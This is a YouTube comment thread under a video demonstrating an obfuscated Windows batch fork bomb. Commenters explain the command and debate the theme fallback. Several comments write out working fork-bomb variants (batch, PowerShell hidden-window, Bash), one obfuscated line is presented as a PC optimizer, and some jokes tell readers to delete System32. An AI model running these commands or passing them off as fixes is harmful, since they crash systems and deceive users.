Guys stop calling it Windows Aero but not transparent, it’s called Windows Basic, although more commonly referred to as Aero Basic. Used as a fallback theme since Windows Vista, and used as an actual selectable theme in Windows Vista and Windows 7. In this specific case, a lot of things happened that caused Windows to be unable to load Windows Basic as a fallback theme, so it used a very old-style and pretty basic theme that resembles Windows Classic, but not exactly, the “frame” of the window looked a little different.
Windows Basic is used when dwm.exe is not running, while here the whole graphics driver had a little meltdown, so windows had to resort to the weird Windows classic theme.
@@ItzYoshi87 I'm right; the Windows Vista/7 Basic theme is the first fallback he was referring to as "non transparent Windows Aero." Windows Classic is the 9x window look that serves as the second fallback. If you understood my comment, you'd realize that.
That happened to me once. I have an underpowered windows pc and going from full screen back to normal size is enough to make chrome crash sometimes. So I was trying to do it especially fast and then it froze. Then it switched to the classic UI. Lesson learnt: don't exit out of yt full screen quickly
I'm surprised cause normally it reverts to non transparent windows Aero. So whatever is going on really broke something to the point it had to revert to the 9x classic UI elements.
1:47 "I think the video driver crashed" if it did, windows would fall back to the default VGA display driver which only supports the 800x600 display resolution, so the screen resolution would drop immediately. however, the error message box theme was once default and then turned to the traditional windows style, so it's the desktop window manager (aka dwm.exe) that crashed... or at least generated an exception
@@thatonebroski the video driver doesn't display the screen - think of it, why can you see your UEFI in such high quality without the video driver? Essentially it extends the screen, doing things like supporting higher screen resolution and performance. If it crashes the screen goes into 800x600 resolution, and it takes time (a few seconds on average) for a black screen with cursor to escalate back to normal
dwm having an error is not the reason, else it would have been the Windows Basic (commonly referred to as Aero Basic) theme instead of the old style theme that looks like a weird Windows Classic. Something else was the problem here. If I had to guess, it was something with winlogon, because that usually happens when winlogon is killed.
@@idogaming3532 no, dwm.exe is actually a child process to winlogon.exe, when you terminate winlogon.exe it terminates most child processes, including dwm.exe, that's dwm that makes the appearance more fresh
Yeah I had similar happen when there was (sometimes still is) a memory leak with DWM and intel's integrated drivers for a specific CPU. One day I accidentally left it too long and it used up all the ram, caused DWM to crash badly, corrupted my entire windows install including the boot folder :') Same thing happened though, screen went black and broke really badly.
Somehow managed to make it work though via just sheer hope and prayers lmao. Didn't need to reinstall windows
Last time I installed windows, I didn't connect it to the internet. And at first I had the 800x600 driver, but then it became 1080p but said "Microsoft Display adaptor"
@@videocommenter I did remove some part of system32 since its a garbage..well your correct it kinda run faster! theres also some garbage folder like systemwow and sys86
@@walksanator %0 is the current process, the pipe takes any output from that process and then runs the %0 process. This happens recursively. So, it’s a forkbomb.
@@МР4 bloatware that runs all the time for sole reason to catch ctrl+alt+f4 combo and then kill foreground app process (alt+f4 sends quit signal not terminate process) if you dont have problems with pc its useless to have it run all the time
CTRL + ALT + DELETE CTRL + SHIFT + ESC ALT + F4 (If an app is crashing it and blocking stuff, uses the super f4 app): CTRL + ALT + F4 Power Button Power Supply Switch
What a great one-liner, not only does it have prank-potential, but I'm certain it can find use in hobbyist malware as an alternative to forcefully shutting down or bluescreening!
I don't know if the obfuscation was supposed to suggest otherwise but I knew it was fork bomb as soon as I saw the title of the video. The pipe character is a dead give away.
funny how Windows will just die from a fork bomb, but Linux will somehow survive it and after a few minutes my system unfreezes after running it. Might honestly just depend on how many system resources you have.
Depends, if you don’t have an OOM killer enabled it won’t come back, and even with it Linux can sometimes take a very long time to sort itself out, and the OOM killer is pretty indiscriminate, you might end up needing to reboot anyway
on linux it actually depends if there's a limit on the number of possible processes, otherwise the whole system might freeze before the OOM killer kicks in
i remember running it as a bat file in Win10, when the computer automatically restarted my files couldn't open because they were "corrupted", but restarting it manually fixed the error
@@example_handle I gave the VM too much resources (CPU cores and RAM) but it was easy to stop because I could just Alt+F4 the VM and it would instantly stop
Haven't watched the video all the way through yet but I'm guessing it's a fork bomb? the windows equivalent of :(){:|:&};:
also some of the characters in the command are definitely redundant. you don't need to prefix a command with @ to keep it from being shown to the terminal outside of a batch script, and the numerous carets to escape random symbols that don't need escaping could just be removed and it'd work exactly the same (apart form the one in front of the pipe).
EDIT: yeah. Reading the command more closely it's equivalent to
echo. %0|%0 > $_.cmd & $_ > NUL
Writes the text "%0|%0" into a file named "$_.cmd" and then invokes it, redirecting its stdout to the Windows equivalent of /dev/null. It works more or less exactly the same way the Linux fork bomb does, only it looks weirder, and uses a temporary file instead of a function definition because it is 2024 and Windows command interpreter does not support functions.
Wine's CMD interpreter is pretty crusty so it could've been completely misinterpreting it. Although the wine "kernel" is just an unprivileged process so it might've just only grown as far as it could then exhausted some resource.
The farthest back I tried this on was Windows XP, so it’s safe to say that it works on pretty much any NT based OS. I did try with 9x but I couldn’t get it to work
For 9x you would need to change the cmd to bat. Even then it probably won't work because command line pipes are implemented as temporary files in MS-DOS.
For whoever is wondering, the Old UI Theme being shown is because the most recent Windows versions are based on Windows NT, it's the hidden layer behind the new UI.
very informative title! jokes aside thank you for your content i remember watching your videos when i was a child and because of you i am now learning more about PC software,hardware and malware you changed me in a good way
You should make a video (if you haven’t already) about how to truly enable classic theme or the basic aero theme on Windows 10 or 11, not through installing add-ons but through disabling things or other registry tweaks or whatever it would take, since clearly they’re both still built in to windows.
Actually by replacing dwm.exe by rundll32.exe should make aero not load and make aero basic load instead, but it also means you cannot use any uwp apps either cuz they need dwm (BUT DO NOT DO IT ON YOUR REAL SYSTEM)
most of the time I don't understand your videos , but I enjoy them ! it's the best when you crash something , it's so fun to watch . I also learn a lot from your videos
I tried running it in Wine 9.0 and just got "Känner inte igen '$_' som ett internt eller externt kommando, eller batchskript." (it doesn't recognize the command "$_"). By the way, shouldn't you replace the "›" in the video title with ">"?
i ran a fork bomb on Win10 near graduation, and instead of crashing DWM/the video driver, everything got clogged up to the point where the framebuffer was overflowing as well and the bluescreen was 2 pixels tall, and only about a third of the total length of that line was actually blue. it got that bad.
Enderman : Guys, this is a FORK Bomb Fans : Naaah. it's ^_^ Bomb Enderman : Ok, anyway, it'a bomb, and i will not run it in my machine Fans : Really? Enderman : Yeah..... (thinking), or am i? Ok, let's give it a try (the code is running) Oh crap, Ctrl+C, Ctrl+C.. Screw it, exit.
Hey Enderman! Windows 10 HOME Edition Users cant install sandbox windows feature rn for some reason. Could u install windows 10 home and try to hack it to run sandbox? I think Windows home users had sandbox, but its just randomly wont work anymore. Love ur videos❤
Fun fact, fork doesn't duplicate memory until something is changed in execution, so if your forked task doesn't create new memory or do stuff, afaik it doesn't copy at all
Do you plan to do some content on Windows PE? Playing games, exploring differences, modding it, showing quirks and interesting discoveries, idk... adding copilot, microsoft store, desktop, WSL and things like that. Imho it's a goldmine of content
I wanted to donate you some money to support you, even though i don't have that much (wanted to donate atleast 0.67$) But I'm from Belarus and under 14, so i cant link my card to google play. When i open my own bank account i will definitely donate. Your videos are cool and i like them. Youre one of the few toutubers that knows a lot of information about computers and fun to watch. I hope your youtube account doesnt get suspended/terminated in the future
I have batch that I made long time ago (at least 10 years ago) that have only 5 chars: %0|%0 that's it, that was all that make it for fork bomb. Your is just have intermediate state of manually creating one. In my case it was produced popup windows as well and parent was long time destoryed, so there is no way to "terminate tree", you can't stop it because it already closed and every frame it created 2 new ones and one was destroyed. So it is more guaranteed solution to eventually kill everything..
"command script or batch script are interchangable" theres a very, very slight difference: in batch scripts,the ERRORLEVEL variable does not get reset after a successful command, whereas in a .cmd script, it does
Fun fact: if you type a YouTube video's title into command prompt, it will open up your browser and redirect to the video! You can even try it right now by opening cmd and copy and pasting this video's title.
I remember doing something back in school, on some shitty Core 2 DUOs and 2GB of ram, and the funny part was that I was able to sent it to all computers on the school network for some odd reason, and it was really causing alot of chaos in the school that they reinstall Windows not once, BUT 3 TIMES. And we ended up using Linux by the year of the semester.
that was not the video driver that crashed, as when the first error for cmd happened and it was shown, it was the old theme, indicating dwm.exe had an exception or crashed itself, windows does restart dwm.exe if it gets an exception ,so it is dwm.exe. if it was the graphics drivers it would of defaulted from the main display (in your case, on a vm, the vmware display) to "Microsoft Basic Display" and the res would of got to 800x600, but it didn't, indicating dwm.exe crashed - not an exception, as it would of said, in an error "dwm.exe exception". but it didn't, indicating in dwm.exe crashing
8:26 Is it just me or is that PrisimLauncher in the right with the icon renamed to “Minecraft”? If it is Prisim, that means that you (Enderman) use the same launcher as me!
an irrelevant question but, you did a video about running windows on RAM. it was 16gb, and it did have some issues due to the low capacity, but other than that it ran super fast and well. What happens if you used, lets say, 128GB, or 64gb?
Strings that break things fill me with a strange joy.
edit: Who with sponsorblock marked the initial demonstration as "filler"? That's the opposite of filler...
Edit2: Did you actually say windows' name was more sensible than linux? Create process doesn't imply it's a duplicate process in the name. IMO, fork makes more sense.
Somewhere someone’s antivirus is having a hissy fit and blocking YouTube Just like that weird bitmap command a few years back that essentially was just disk check
Start-Process -WindowsStyle Hidden cmd.exe -ArgumentList '/c @echo.%0^|%0>$^_^.c^md&$>_nul' works like a charm in PowerShell, it also does in a PowerShell script.
edit: so I just tried it, it's kinda ass, I had it running for like half an hour and it did shit even :loop start %~f0 goto :loop is more effective... but at least it looks cool
@@rafapapolas8248 twas a joke, i could never be that cruel, even when it seems like it wont corrupt windows
but if u r wondering if u could prank one of your friends, then be my guest. just make sure u try to not to tell one of your friends who understands batch syntax, to input it into command prompt...
i='my god': { while i == true: start calc.exe: /*include whatever process you think wastes the most resources here in this line*/ start %0^|%0 > $ _.cmd & $_: goto i: }
Edit: i just realized that for a boolean argument to be true, it has to have a mathematical argument that is true, not a string... Oof. I guess you could replace i='my god' with:
at echo period percent zero to the power of vertical bar percent zero over dollar sign to the power of underscore to the power of period c to the power of md ampersand dollar sign underscore over nul
hey Enderman I have a question. is Avast Free Antivirus good for windows11? because when I downloaded steam he said that steam will give your laptop malwares and viruses So I think that Avast is bad for laptops is this true?
hey enderman ive have used your website for many reasons and its been very useful but i cant find windows activation keys anymore have you removed them?
bro how did you manage to put windows 10 taskbar buttons, round them, still have windows 11 search and taskview and 10 systemtray?? can anyone reply and tell me how he got the rounded 10 buttons and kept the 11 search and taskview?
Of course, you are just used to his "no talking, only text" videos, but you were just too lazy to watch videos where he is talking or you somehow never clicked on a single video where he talks
Enderman please help me can you make Windows11assiat.exe please make a bypassing win11 eror in it i would recmond resoure hacker please make it i really needs to upgrade please
I found an more helpful that optimizes you're PC: @echo.&setlocal enabledelayedexpansion&set"_=)%"&for /f "b=*" %%# in ('echo(!%_:~1!0^|%0') do (set"_=!%%#:#=_!"&for /f "b=* delims=" %%_ in ("!_!") do (set"$=!%%_:%%~$^_^!"&call :^!&&set "$=!&set ^>!&&call^:#^_^!))>nul
hey man, good video! btw there's a problem with malwarewatch website, i have 0/25 doenloads and when i download something this counter goes up to 25/25 on a single download. pls fix that!
That ^_^ in the middle makes this one-liner more sinister O_O
1376 likesReplies (29)
XD
1 like^_^
0 likes@@cringelord_67 :3
1 likeX3
0 likeso_O
0 likesOwO
2 likes°~°
0 likes@@ColaTai relatable
0 likesUwO
1 like@adbt_ replace the t in your name to a l
1 like@@adbt_ What
1 likeOwO
4 likes>_<
0 likes@@brokovnik a very backrooms thing to say
1 like^^
4 likes;D
4 likes^_^
1 like:P
5 likes@@mintydevil7982 👎
0 likes@Serafim-ik8wx 👎
0 likes@@RadeonVega64 👎
0 likes@@ColaTai 👎
0 likes:3
15 likes"Cmon m8, its safe ^_^"
22 likes('•ω•')
0 likes^w^
20 likes^_^
0 likes>_<
UwU
25 likesSomething that's funny is that the ^ is (one of(??)) batch's escape characters
31 likesThe return of C:\con\con
565 likesReplies (7)
@@EdwardJamesBickels patched
0 likes@@EdwardJamesBickels how does that make an instant bsod?
1 likecon
1 like@@sorsun46 Has to be an elevated powershell.
6 likes@@EdwardJamesBickels i did and nothing happened
3 likes@videocommenter if you want an instant bsod like that, run wininit in powershell.
5 likesMinus the instant BSOD.
55 likesit crashed so hard that the error windows went back to their old theme
1484 likesReplies (65)
@@flickaru thing is my pfp is just your pfp but its a more high quality sprite made by someone
0 likes@@KugelWasHere that's exactly what i said to a guy who had a niko pfp; that's crazy
0 likesi thought you were me for a second
0 likes@@ascpixII pancakes
1 likenoik.... onesh ot???
0 likes@@functional200 it broke DWM
0 likes@@user-nq6wn4hm7syeah, the world machine feels kinda ill today
0 likesIm guessing square stuff caused these glitches
0 likesGuys stop calling it Windows Aero but not transparent, it’s called Windows Basic, although more commonly referred to as Aero Basic. Used as a fallback theme since Windows Vista, and used as an actual selectable theme in Windows Vista and Windows 7. In this specific case, a lot of things happened that caused Windows to be unable to load Windows Basic as a fallback theme, so it used a very old-style and pretty basic theme that resembles Windows Classic, but not exactly, the “frame” of the window looked a little different.
0 likesWindows Basic is used when dwm.exe is not running, while here the whole graphics driver had a little meltdown, so windows had to resort to the weird Windows classic theme.
omg its niko oneshot!!!!1
0 likes@@niko_the_guy_40 Niko Overdose
2 likesWhat is going on here
1 like@@ponikgd Its raining nikos
2 likesNah. This is just windows jank because they use DWM for drawing the entire interface which was NOT it's purpose
0 likes@@ponikgd ONESHOT
0 likes@@sus_sand5811 ONESHOT
1 likeWhy all of the nikos here
2 likesONESHOT
1 likeKoni
0 likesniko pfp spotted
0 likesThey should allow it
1 like@@yousefslimani99☹️
0 likes@@raduminecraft1 ?
0 likes@@_kitaes_ I mean dwm.exe which means desktop window manager
0 likes@@raduminecraft1 dwm
0 likesniko :3
0 likes@@LousyBook01 correct
0 likes@@gmdtungsten Geometry Dash
1 likeNiko :4
0 likesthat happened to me when loading ocular miracle in gd
0 likesit has something to do with the logonui, winlogon or dwm
0 likesYou can also trigger it by using the win32 api to set the theme to null or ""... If I remember correctly...
0 likes@@yousefslimani99 average work at a pizza place experience
0 likesThe most recent Windows versions are based on Windows NT, it's the hidden layer behind the new UI.
1 likeThis can also happen when DWM is not working.
0 likesniko onesho
3 likes@@ItzYoshi87 I'm right; the Windows Vista/7 Basic theme is the first fallback he was referring to as "non transparent Windows Aero." Windows Classic is the 9x window look that serves as the second fallback. If you understood my comment, you'd realize that.
0 likes@@yousefslimani99😂😂😂😂😂😮😢😢😂😮😂😢
0 likesThat happened to me once. I have an underpowered windows pc and going from full screen back to normal size is enough to make chrome crash sometimes. So I was trying to do it especially fast and then it froze. Then it switched to the classic UI. Lesson learnt: don't exit out of yt full screen quickly
0 likes@@thiscateatspancakes2451 noway
0 likesNIKO PFP SPOTTED!!!!!!!
4 likeswindows went to heaven with its older versions
1 likeniko pfp spotted
5 likes@@flickaru Windows got brain demage.
1 likeniko
6 likes:O
10 likesomg guys it's niko oneshot!!1!!
12 likesThat's because windows is retardedly a skin on top of a skin on top of a skin on top of the skin at this point. So much bloat holy shit.
0 likesI saw you in betawiki discord server
1 likeOnce I used some application to suspend dwm.exe and stopped it.
1 likeIt looked like windows 7
@@Heisenberger_69ur wrong thats windows classic
0 likes@@yousefslimani99 what
0 likeswhat a mouthful
0 likes@@functional200 don't like to be that guy but it's not called "non transparent Windows Aero" it's called "Windows Basic"
4 likes@@yousefslimani99 🦈🦈🦈🦈🦈🦈🦈🦈
1 like@@yousefslimani99 i guess you are the one who is crashing windows so hard that the error windows went back to their old theme.
4 likes@@Ordlnary_Gamer it also appears for a split sec when u crash windows
4 likes@@Ordlnary_Gamer aka the aerobasic theme but with different buttons especially in vmware if ur laptop cant load aero in windows vista/7
5 likesIt’s the fallback theme, it means it shit itself so much it couldn’t even load aero
51 likesI'm surprised cause normally it reverts to non transparent windows Aero. So whatever is going on really broke something to the point it had to revert to the 9x classic UI elements.
80 likessnap back to reality
24 likes@@yousefslimani99 ?
1 like@@yousefslimani99 😱😱😱😱
1 like@@yousefslimani99😀
20 likes😠😠😠😠😠😠😠😠😡😡😡😡😡😡😡😡
11 likes1:47 "I think the video driver crashed" if it did, windows would fall back to the default VGA display driver which only supports the 800x600 display resolution, so the screen resolution would drop immediately. however, the error message box theme was once default and then turned to the traditional windows style, so it's the desktop window manager (aka dwm.exe) that crashed... or at least generated an exception
516 likesReplies (10)
@@thatonebroski I don't think the cursor is related to the driver.
0 likes@@thatonebroski the video driver doesn't display the screen - think of it, why can you see your UEFI in such high quality without the video driver? Essentially it extends the screen, doing things like supporting higher screen resolution and performance. If it crashes the screen goes into 800x600 resolution, and it takes time (a few seconds on average) for a black screen with cursor to escalate back to normal
0 likesif the video driver crashed, why can you see the cursor?
0 likesdwm having an error is not the reason, else it would have been the Windows Basic (commonly referred to as Aero Basic) theme instead of the old style theme that looks like a weird Windows Classic. Something else was the problem here. If I had to guess, it was something with winlogon, because that usually happens when winlogon is killed.
0 likes@@skylarkblue1, on VMware, it's different
0 likes(do not ask how I know)
should have tried to press Ctrl + Shift + Windows + B to restart the video drivers and seeing what happens
8 likes@@idogaming3532 no, dwm.exe is actually a child process to winlogon.exe, when you terminate winlogon.exe it terminates most child processes, including dwm.exe, that's dwm that makes the appearance more fresh
0 likesOr winlogon.exe lost access to the themes area in memory.
5 likesYeah I had similar happen when there was (sometimes still is) a memory leak with DWM and intel's integrated drivers for a specific CPU. One day I accidentally left it too long and it used up all the ram, caused DWM to crash badly, corrupted my entire windows install including the boot folder :') Same thing happened though, screen went black and broke really badly.
11 likesSomehow managed to make it work though via just sheer hope and prayers lmao. Didn't need to reinstall windows
Last time I installed windows, I didn't connect it to the internet. And at first I had the 800x600 driver, but then it became 1080p but said "Microsoft Display adaptor"
25 likesguys i ran this and it made my pc even faster! its even got a ^_^ to show you how safe it is!
976 likesReplies (30)
@@videocommenterit would be faster but it wouldn't run anymore
0 likes@@xpower7125 d
0 likesSilly
0 likesSilly
0 likesyou can also delete windows to make your pc faster
0 likes??????????????😅
0 likesthis is trash talk to microsoft
0 likesno offense to @kevinboiiiii
running now...
0 likeslol
0 likes@@sacrifice3 what does that even mean
0 likes@@sacrifice3 what
0 likes@@sacrifice3 ok
0 likes@@riggyuttdsay skibidi rizz gen alpha robux for rebex
0 likes@@Monkeymario. robux 3 times
0 likesOMG MY COMPUTER IS SO MUCH FASTER!111!!!! :O :D ALSO SAY ROBUX 3 TIMES FOR FREE ROBUX :)
0 likes@@Czecherboard or more gpu
0 likesThis is targeted at people who read comments before watching the video
0 likes@@videocommenter and u can uninstall the C: drive to make it faster than light
0 likes💀
0 likes@@Czecherboard thats lame...everyone know thats a virus! i prefer pcoptimizerpro!
0 likes@@videocommenter I did remove some part of system32 since its a garbage..well your correct it kinda run faster! theres also some garbage folder like systemwow and sys86
0 likesOr you can download more RAM to make it faster
6 likesEven gives you a selfie :D
1 likeAww
2 likescan confirm
2 likesNo escape made by pc virus free try that too
0 likesdelet system69
1 like@@videocommenteri did
7 likesYou can also delete System32 to make your computer even more faster.
47 likesi tried that and it gave me ^_^ message
38 likes"isn't it beautiful?"
388 likescomputer dies
Replies (2)
I love that Two Stupid Dogs reference.
0 likes🤣🤣
1 likebro created the ^_^ bomb
272 likesReplies (1)
^_^ cute emoji(nuclear bomb)
7 likesthe equivalent of putting a fork into a microwave. but for windows.
233 likesReplies (5)
i have an idea: how about we call it a fork bomb then?
0 likesYAY!11!! I HAVE SO MUCH RABUX
0 likesyou can even do it for a few seconds and still be fine like he did in the video
2 likesThe equivalent to defenestrating the window through its self
5 likesThe equivalent of hurling a microwave at a window
12 likes1:36
229 likesthe system literally cannot
Replies (5)
@@Z3n17h_ no way someone acknowledges emkay
2 likesThe system cannot :(
7 likesWindows moment
8 likesThat’s Windows
8 likes'Your PC can't'
15 likesEmkay
When I saw the %0^|%0 I just knew
107 likesReplies (3)
@@walksanator %0 is the current process, the pipe takes any output from that process and then runs the %0 process. This happens recursively. So, it’s a forkbomb.
12 likesWhat's it mean
1 like@@BetterCallBigShotAutos same. I recognized it instantly
0 likesEvery windows user when windows crashes:
201 likesCTRL + ALT + DEL 💥
CTRL + SHIFT + ESC 💥
ALT + F4💥
Replies (18)
@@shadowlord0162 Super is the same as the windows key.
0 likesDESTROY PC WITH 4 KG OF PLASTIC EXPLOSIVES 💥
0 likesDonate PC to homeless children 💥
0 likesMy order:
0 likesALT + F4
CTRL + SHIFT + ESCAPE
CTRL + ALT + DELETE
REISUB
@@МР4 bloatware that runs all the time for sole reason to catch ctrl+alt+f4 combo and then kill foreground app process (alt+f4 sends quit signal not terminate process) if you dont have problems with pc its useless to have it run all the time
0 likesme when there is a virus: win + d
0 likesGIVE UP AND LIVE AMONGST SQUIRRELS 💥
1 likeOk
0 likesREINSTALL WINDOWS 💥
2 likesthe classic
1 likeretry retry abort abort abort when msdos has an error
@@Kalphalus super f4? whats that
0 likes@@Kalphalus there is a super alt f4?
0 likesThis is my order on what I do:
6 likesCTRL + ALT + DELETE
CTRL + SHIFT + ESC
ALT + F4
(If an app is crashing it and blocking stuff, uses the super f4 app): CTRL + ALT + F4
Power Button
Power Supply Switch
FILL PC WITH SAND 💥
18 likesUNPLUG PC 💥
11 likesPOWER BUTTON 💥
19 likestop 4 keybinds
5 likesCTRL + SHIFT + WIN + B 💥
31 likesI started laughing the moment I read the title. Hilarious. I didn't realize I could spot a forkbomb so easily.
46 likesReplies (1)
DeArrow (a browser extension to reduce clickbait) spoiled the fact it's a fork bomb to me
6 likesWhat a great one-liner, not only does it have prank-potential, but I'm certain it can find use in hobbyist malware as an alternative to forcefully shutting down or bluescreening!
40 likesopens notepad++
47 likesmr krabs! i have an ideeeaaaaa
Replies (3)
I made an ahk app that runs it in the background so if you run the program it will run this fork bomb
1 like@@it_is_i.mp4 yippeeeeeeeeee
1 likei actually made it a .bat file!
3 likesy'all my idea is workin
I don't know if you know this, but pressing Control + Win + Shift + B, you reset video drivers.👍
96 likesReplies (3)
if nothing happens, so is win+shift+b.
2 likesit will only execute after the hang.
@@Lynixity bruh
0 likesaye he knows that dw
8 likesyour voiceover, with the computer sounds and the clicking of the keyboard, makes this video remind me a lot of the great dancoot1
30 likesReplies (1)
You mean danooct1?
13 likesFun fact: i recently discovered that this also works on Windows 7, so it will probably work on XP, 8 and 10.
15 likesReplies (1)
I think it will work fine on Windows 2000 but I"m not sure about earlier NT versions. DOS versions will not work.
4 likes"oh no, my computer crashed ! But I had an antivirus..."
2 likesI don't know if the obfuscation was supposed to suggest otherwise but I knew it was fork bomb as soon as I saw the title of the video. The pipe character is a dead give away.
17 likesA fork bomb? No, no, it's a CreateProcessW bomb
8 likesBro actually broke Alt+F4 💀
219 likesReplies (6)
@@Player-fg4ub Because Alt+F4 doesn't kill processes, it simply sends the shutdown command to the currently focused program.
4 likesThe program can do whatever with it, or it can ignore it, or the system can just be too bloody busy.
@@Itzdru.xd_ how did he even break it
0 likes@@Player-fg4ub Alt+F4 is a shortcut key to close apps
0 likeswhat does this even mean
0 likesLike Ctrl+W on chrome
1 likeye
0 likes8:13 bro lit a bomb and tried to pinch the fuse 🤣🤣🤣🔥💣🤏
12 likesfunny how Windows will just die from a fork bomb, but Linux will somehow survive it and after a few minutes my system unfreezes after running it.
97 likesMight honestly just depend on how many system resources you have.
Replies (12)
Depends, if you don’t have an OOM killer enabled it won’t come back, and even with it Linux can sometimes take a very long time to sort itself out, and the OOM killer is pretty indiscriminate, you might end up needing to reboot anyway
1 likeTried on the linux machine and it just hung before anything happen. Not even oom.
0 likes@@FluffyFoxUwU i cant help you with that
0 likeshey laglife run this command in your main windows pc >:)
0 likesAnd if an automatic oomkiller is not present like systemd-oomd Alt + Sysrq + F just kills the memory hog
3 likesYOOO LAGLIFE
0 likesandroid dies too, like i would have expected they must have some process count limit per app using linux's cgroup or something
8 likes@@archlinus5066 and when that happens you have the sysrq key
0 likeson linux it actually depends if there's a limit on the number of possible processes, otherwise the whole system might freeze before the OOM killer kicks in
30 likes@@SkylarrI've had my ram fill up and random processes I had running close. Once my discord literally closed mid call lol
16 likesLinux doesn't have a problem with killing processes when it's out of memory, I'm not sure how windows handles it.
47 likesyooo laglife
1 likehow about %0|%0 - doesn't that do a similar thing?
17 likesedit: i just ran that in a VM and managed to fork bomb my host machine 😭
Replies (3)
i remember running it as a bat file in Win10, when the computer automatically restarted my files couldn't open because they were "corrupted", but restarting it manually fixed the error
0 likes@@example_handle I gave the VM too much resources (CPU cores and RAM) but it was easy to stop because I could just Alt+F4 the VM and it would instantly stop
0 likesRip 💀😭
3 likesYes! Let's gooooo new video!!
60 likesReplies (8)
@@piggy004 oh ok
0 likes@@EnifOfficial he’s a YouTuber that plays Roblox
0 likes@@piggy004 dude what. im talking about enderman not this guy and who is kreekcraft anyways
0 likes@@EnifOfficial no, this channel hates kreekcraft
0 likes@@y00t00b3r idk. but i hope he doesn't lol
0 likesY’all, he hates kreek craft.
0 likestf is your profile
0 likesdid he get banned or something? what's the deal?
0 likesWin+Ctrl+Shift+B reloads the graphics driver.
10 likesReplies (2)
@@32thOh no how in the world is this a good sound
0 likesThat beep gives me sticky keys flashbacks
it also plays a cool sound
0 likesHaven't watched the video all the way through yet but I'm guessing it's a fork bomb? the windows equivalent of :(){:|:&};:
7 likesalso some of the characters in the command are definitely redundant. you don't need to prefix a command with @ to keep it from being shown to the terminal outside of a batch script, and the numerous carets to escape random symbols that don't need escaping could just be removed and it'd work exactly the same (apart form the one in front of the pipe).
EDIT: yeah. Reading the command more closely it's equivalent to
echo. %0|%0 > $_.cmd & $_ > NUL
Writes the text "%0|%0" into a file named "$_.cmd" and then invokes it, redirecting its stdout to the Windows equivalent of /dev/null. It works more or less exactly the same way the Linux fork bomb does, only it looks weirder, and uses a temporary file instead of a function definition because it is 2024 and Windows command interpreter does not support functions.
Do not put the fork in the terminal.
27 likesReplies (4)
@@Baburun-Samaand also a fork in the toaster
0 likesdidnt work
0 likesYuyuko
0 likesAnd also the Fork in the Outlet
2 likesBro desperately trying to break the command killed me lol
2 likesMy computer is so good that It does that without me even running the command👍🏻
4 likesthat instantly causes a stack overflow under wine
6 likesReplies (2)
Wine's CMD interpreter is pretty crusty so it could've been completely misinterpreting it. Although the wine "kernel" is just an unprivileged process so it might've just only grown as far as it could then exhausted some resource.
2 likesSTACK OVERFLOW NMENTIONED
2 likesThe farthest back I tried this on was Windows XP, so it’s safe to say that it works on pretty much any NT based OS. I did try with 9x but I couldn’t get it to work
7 likesReplies (4)
@@LavaCreeperPeoplecry about it
1 likeW pfp
5 likesFor 9x you would need to change the cmd to bat. Even then it probably won't work because command line pipes are implemented as temporary files in MS-DOS.
2 likesL pfp
1 likeSomeone added this to the fork bomb wikipedia page
2 likes2:35 The jump from 291 to 623 processes in background, what a disaster.
1 likeWe love you Enderman (Andrew)
75 likesReplies (6)
@@МР4ik I’m subbed to both of them
0 likes@@MineGreat123 Hello. >w>
1 like@@JoBot__ oh hello how did i found you there? :D (i'm theprebeta)
2 likesor Andrewman
6 likes@@yusifsrifov7687 "We" inherently includes you.
1 likeme too
3 likespc: dies
2 likesalso pc: classic theme cuz i couldnt find dwm when it crashed
"Ну только посмотрите на эту прекрасную строку"
1 likeкомпьтер померает
Yeeeyyy, new video, don't really now why didn't notice it yesterday
zuma on desktop... gigachad
7 likesReplies (1)
I still have that game.
0 likesFor whoever is wondering, the Old UI Theme being shown is because the most recent Windows versions are based on Windows NT, it's the hidden layer behind the new UI.
2 likesFun fact: This one-liner won't work as intended if you have a variable named: 0^|
2 likesYou can modify $_.cmd this way without modifying the one-liner itself.
Welcome back! Wonderful video as always. Great job on the narration as well!
3 likesimagine if you just button bashed this string in your computer and destroyed it in the process
5 likesvery informative title! jokes aside thank you for your content i remember watching your videos when i was a child and because of you i am now learning more about PC software,hardware and malware you changed me in a good way
3 likesthe sequel to con/con and kernelconnect
1 likeThe Enter at 0:59 is the least aggresive Enter I've ever heard
1 likeit's good to have you back! We really missed your videos. Please try to release videos more often.
2 likesFamous last words: "Isn't it beautiful?"
1 likeYou should make a video (if you haven’t already) about how to truly enable classic theme or the basic aero theme on Windows 10 or 11, not through installing add-ons but through disabling things or other registry tweaks or whatever it would take, since clearly they’re both still built in to windows.
1 likeReplies (1)
Actually by replacing dwm.exe by rundll32.exe should make aero not load and make aero basic load instead, but it also means you cannot use any uwp apps either cuz they need dwm
2 likes(BUT DO NOT DO IT ON YOUR REAL SYSTEM)
What if you try this command on older versions as well?
2 likesmost of the time I don't understand your videos , but I enjoy them ! it's the best when you crash something , it's so fun to watch . I also learn a lot from your videos
1 likeglad to see you back
0:27 pretty normal for windows 11, all u gotta do is restart explorer
1 likethe UWUWUWUWUWUWUWU of despair as the fork bomb runs JGKDJFKDMG
1 likeIt originated in Unix not Linux
3 likesfork just means you split the process in two, idk whats confusing about that
that's one funky fork bomb
2 likesEnderman i have a challenge for you. Install Windows to folder named / it should be Very brocken
2 likesthe bass boosted or am I I fucking CANT BRO 😭
0 likesI tried running it in Wine 9.0 and just got "Känner inte igen '$_' som ett internt eller externt kommando, eller batchskript." (it doesn't recognize the command "$_").
5 likesBy the way, shouldn't you replace the "›" in the video title with ">"?
Replies (2)
@@Endermanch
2 likesOh, why that? Can't they sanitize so no-one can inject HTML?
Yes you should! Angle brackets aren't allowed in YouTube titles.
2 likesso, funny story, right
5 likesi ran a fork bomb on Win10 near graduation, and instead of crashing DWM/the video driver, everything got clogged up to the point where the framebuffer was overflowing as well and the bluescreen was 2 pixels tall, and only about a third of the total length of that line was actually blue. it got that bad.
you make the BEST videos!!! been watching since 2020 or 2021 :)
1 like4:38 Nightmare for any beginners trying to learn git
2 likesI love when you cause a error so bad windows goes back a few generations with its theme, not sure if thats windows 7 or 8, I'd say 8
1 likeReplies (2)
Just run the command 🤓
0 likesHow can I recreate it?
0 likesBut does Ctrl + Win + Shift + B work when the graphics driver goes off?
3 likesEnderman : Guys, this is a FORK Bomb
2 likesFans : Naaah. it's ^_^ Bomb
Enderman : Ok, anyway, it'a bomb, and i will not run it in my machine
Fans : Really?
Enderman : Yeah..... (thinking), or am i? Ok, let's give it a try
(the code is running) Oh crap, Ctrl+C, Ctrl+C.. Screw it, exit.
New Idea: Installing Windows with a Directory of " " spacebar
2 likesThe new video is special one its a new idea!
10 likesCtrl shift win B restarts the gpu, fun fact!
